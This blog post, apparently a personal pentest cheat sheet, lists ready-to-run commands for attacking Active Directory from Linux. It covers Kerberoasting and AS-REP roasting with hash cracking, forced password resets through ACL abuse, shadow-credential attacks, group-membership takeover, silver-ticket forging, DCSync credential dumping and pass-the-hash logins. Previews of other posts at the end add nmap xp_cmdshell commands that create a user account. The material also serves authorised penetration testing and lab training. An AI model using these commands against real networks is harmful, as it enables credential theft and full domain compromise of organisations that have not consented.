Skip to main content

Active Directory Penetration Testing using Linux

By

 


Kerberoasting

#Get TGS Ticket Using GetUserSPNs.py
sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark 
Find Pre-Auth Disabled Users

GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10

#brute force the hashes
hashcat -a 3 -m 18200 a.txt /usr/share/wordlists/rockyou.txt --force
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 

List ACL's/Attributes with write access to a Specific User

bloodyAD --host dc01.domain.local -d domain.local -u User -k get writable --detail
bloodyAD --host dc01.domain.local -d domain.local -u User -p 'password' get writable --detail
Running Bloodhound on Linux 

#Match the Time with Doamin controller. 
sudo apt-get install ntpdate
sudo ntpdate <DC IP>

#Add required DNS to /etc/hosts if there is no direct DNS 

#Once you have creds for any user -run blood hound to look for priv esc
git clone https://github.com/dirkjanm/BloodHound.py
pip install
bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns 10.10.10.10 -c All
Abusing GenericAll or ForceChangePassword or Password Reset

git clone https://github.com/CravateRouge/bloodyAD

#User1 has GenericAll Permisions on User2
#Change password for User2
python bloodyAD.py -u "User1" -p "Password1" -d "domain.local" --host "10.10.10.4" set password "User2" "12345678"

#Method 2 
impacket-changepasswd 'domain.local'/'TargetUser' -reset -altuser 'ControlledUser' -althash :'1233432234'

#change password when you have NT hash
sudo ntpdate -s 10.10.10.10
impacket-getTGT domain.local/d.baker  -hashes 12312321:12312213
export KRB5CCNAME=$(pwd)/d.baker.ccache
─$ bloodyAD --host "dc01.domain.local" --kerberos -d "domain.local" --dc-ip "10.10.10.10" set password "a.carter" "12345678@abc"

#Method - 3 : Changing password using Hash 
pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

#Method - 4 : Changing Password using Hash 
bloodyAD -u 'ControlledUser' -p ':1a56d4as156da4s56asdadasd556' -d domain.local --dc-ip 10.10.10.10 set password sam 'P@ssw0rd!'

Abusing GenericAll - Targeted Kerberoasing - Setting Pre-Auth

#use this when you have NT Hash instead of Creds;
#use targetedKerberoast - when you have username/password

#Request TGT; Add $ for Machine/Computer Accounts; $ is not required for user accounts
impacket-getTGT Domain.Local/ControlledUser$ -hashes f2w34r34eg54t354g345213:g3t343fg434tg343t4334gqgu

#Add the TGT path to Env Varaibles
export KRB5CCNAME=$(pwd)/ControlledUser$.ccache

#Set Pre-auth for a TargetUser; -k is to use Kerberos auth; uses KRB5CCNAME ENV variable 
bloodyAD --host dc01.domain.local -d "Domain.Local" --dc-ip 10.10.10.10 -k add uac TargetUserName -f DONT_REQ_PREAUTH

#Get the list of users 
netexec smb   dc01.domain.local -u ControlledUser$ -k --use-kcache  --rid-brute | grep "SidTypeUser" | cut -d "\\" -f2 | cut -d " " -f1 > users.txt

#Dump the Hashes of Pre-Auth Disabled Users 
GetNPUsers.py domain.local/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.10

#Crack the hash 
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

Abusing GenericWrite/ Shadow Credential Attack

targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. 
for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), 
print the "kerberoast" hash and delete the temporary SPN set for that operation. This is called targeted Kerberoasting

git clone https://github.com/ShutdownRepo/targetedKerberoast.git
python -m pip install -r requirements.txt

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword' --dc-ip 10.10.10.10

#Crack the hash 
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

####### IF you are unable to crack KRBTGT HASH ########
# Next Option is to Get NT hash - then pass the hash to login
#Shadow Credentials attack - it generates a cert, use that cert to get TGT
#Then use TGT to get NT Hash 
#use any of the below Method 

METHOD 1 ###### Using certipy-ad ##############
#mostly works on Certificate authority users (CA_SVC)
certipy-ad shadow -u 'ControlledUser' -p 'P@ssw0rd!' -dc-ip '10.10.10.10' -account 'Victim_User' auto

METHOD 2 ###### using pywhisker & PKINITtools  ##########

git clone https://github.com/ShutdownRepo/pywhisker.git
python -m pip install -r requirements.txt
sudo python setup.py install 

# Install pywhisker
pywhisker -d "DOMAIN.Local" -u "ControlledUser" -p "P@SSw0rd!" --target "victim_user" --action "add"
[+] Saved PFX (#PKCS12) certificate & key at path: XNGPSfJF.pfx
[*] Must be used with password: Tg8nymEvBWvLLsJoGmXA
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

# Install PKINITtools
git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

#incase of libcrypto errors 
pip3 install -I git+https://github.com/wbond/oscrypto.git

# Obtain a TGT 
# Use the -cert-pfx & -pfx-pass from pywhisker
python ./gettgtpkinit.py -cert-pfx ./XNGPSfJF.pfx -pfx-pass Tg8nymEvBWvLLsJoGmXA DOMAIN.Local/victim_user TGT.ccache
[*] INFO:minikerberos:0eea2afda8e666301911b3cd28f5b0004f59fb9ee71b04ba2bd507354e7d6691
[*] INFO:minikerberos:Saved TGT to file

#Save the TGT.ccache file to PATH 
export KRB5CCNAME=/home/user/TGT.ccache

#Get NT Hash 
#Use the key from gettgtpkinit.py 
python getnthash.py -key 0eea2afda8e666301911b3cd28f5b0004f59fb9ee71b04ba2bd507354e7d6691 DOMAIN.Local/victim_user
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[+] Recovered NT Hash b121d1522bddd4578c97g5a6a1158891

#use evil-winrm to login
evil-winrm  -i 10.10.10.10 -u victim_user -H b121d1522bddd4578c97g5a6a1158891
Abusing Generic Write on Group - Adding a user to Target group

# Adding a user when you have username/password 
net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

#Adding a User when you have NT Hash - this only work when NTLM Auth is enabled 
pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

#Verify if the user is added successfully
net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

Adding a user when you only have NT Hash and NTLM auth is not enabled - only kerberos 
#List the members of the group
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -u 'ControlledUser$' -k get object "CN=TargetGroup,OU=Target,DC=Domain,DC=Local" --attr member

#add yourself/ControlledUser to the group 
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -u 'ControlledUser$' -k add groupMember "CN=TargetGroup,OU=Target,DC=Domain,DC=Local" 'UserToAddtoGroup$'

#Validate if the user is now added to the target group
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -u 'ControlledUser$' -k get object "CN=TargetGroup,OU=Target,DC=Domain,DC=Local" --attr member

Abusing WriteOwner on a Group 

Example Scenario: `USER1` has write owner permissions on `dev_group@DOMAIN.LOCAL` and it  has `dev_user` user

#change the ownership of the object
owneredit.py -action write -new-owner 'USER1' -target 'dev_group' 'DOMAIN.LOCAL'/'USER1':'P@ssw0rd!'

#To abuse ownership of a group object, you may grant yourself the AddMember privilege
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'USER1' -target-dn 'CN=dev_group,CN=USERS,DC=DOMAIN,DC=LOCAL' 'DOMAIN.LOCAL'/'USER1':'P@ssw0rd!'

# Add yourself/user to the group 
net rpc group addmem "dev_group" "USER1" -U 'DOMAIN.LOCAL'/'USER1'%'P@ssw0rd!' -S "dc01.DOMAIN.LOCAL"

#Check if the user is added successfully 
net rpc group members "dev_group" -U 'DOMAIN.LOCAL'/'USER1'%'P@ssw0rd!' -S "dc01.DOMAIN.LOCAL"
Abusing WriteOwner Permission on User

#ControllerUser has WriteOwner permissions on  Victim_User
owneredit.py -action write -new-owner 'ControllerUser' -target 'Victim_User' 'DOMAIN.Local'/'ControllerUser':'Controlled_Passwd'

# Set full control of Victim_User to ControllerUser
dacledit.py -action 'write' -rights 'FullControl' -principal 'ControllerUser' -target 'Victim_User' 'DOMAIN.Local'/'ControllerUser':'Controlled_Passwd'

#install Certipy
pip3 install certipy-ad

#Certipy’s `shadow auto` command to retrieve the NT hash of the victim.
certipy shadow auto -u 'ControllerUser@DOMAIN.Local' -p "Controlled_Passwd" -account 'Victim_User' -dc-ip '10.10.10.10'
[*] Successfully restored the old Key Credentials for 'Victim_User'
[*] NT hash for 'Victim_User': b121d1522bddd4578c97g5a6a1158891

#use evil-winrm to login
evil-winrm  -i 10.10.10.10 -u victim_user -H b121d1522bddd4578c97g5a6a1158891


Requesting TGT

impacket-getTGT domain.local/Username:'P@ssw0rd' -dc-ip 10.10.10.10
impacket-getTGT domain.local/Username@dc01.domain.local -dc-ip 10..10.10.10

export KRB5CCNAME=$(pwd)/username.ccache

evil-winrm -i dc01.domain.local -r domain.local

Forging Silver Ticket

A Silver Ticket attack involves forging a Kerberos service ticket (TGS) to gain unauthorized access to specific services (SPNs) on a Windows domain without needing interaction with the Domain Controller (DC). Unlike a Golden Ticket, which compromises the KRBTGT account and can create tickets for any service, a Silver Ticket is limited to the service for which it is forged.

#get SID of a ControlledUser/MachineAccount/ServiceAccount
nxc ldap dc-01.domain.local -u 'ControlledUser' -p 'Password' --get-sid

#Forge a Kerberos service ticket (TGS) for a specific SPN.
#TGS (Ticket Granting Service) ticket is generated without needing to communicate with the Key Distribution Center (KDC)
#SPN Examples - MSSQLSvc/sqlserver.domain.local, HTTP/webserver.domain.local, CIFS/server.domain.local
impacket-ticketer -nthash 1a21d6fa64sdfsd1sd4sd5sr5e123 -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain domain.local -spn cifs/server.domain.local Administrator

#forged Silver Ticket is stored as a Kerberos Credential Cache (ccache) file; export it to KRB5CCNAME env to use it 
export KRB5CCNAME=Administrator.ccache

#login via any if below means 
evil-winrm -i server.domain.local -r domain.local
smbclient.py -k -no-pass server.domain.local
psexec.py domain.local/Administrator@server.domain.local -k -no-pass
wmiexec.py domain.local/Administrator@server.domain.local -k -no-pass
DCSync Attack

secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'

Enabling a User account 

#List userAccountControl attribute of all the users 
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -k get search --filter "(objectClass=user)" --attr userAccountControl

#enable an User account 
bloodyAD --host dc01.domain.local -d "domain.local" --dc-ip 10.10.10.10 -k remove uac $Disabled_USER -f ACCOUNTDISABLE

#Validate if the user account is enabled or not 
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -k get search --filter "(objectClass=user)" --attr userAccountControl
krbrelayx 

git clone https://github.com/dirkjanm/krbrelayx

#Incase of Openssl error - #  'OpenSSL.crypto' has no attribute 'PKCS12
pip install pyOpenSSL==24.0.0 --break-system-package



Ping Sweep

#!/bin/bash

network=$1

for ip in {1..254}; do
    if ping -c 1 -W 1 $network.$ip | grep -q "64 bytes"; then
        echo "Host $network.$ip is up"
    fi
done


save the above script into ping_sweep.sh
chmod +x ping_sweep.sh
./ping_sweep.sh 192.168.1



Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more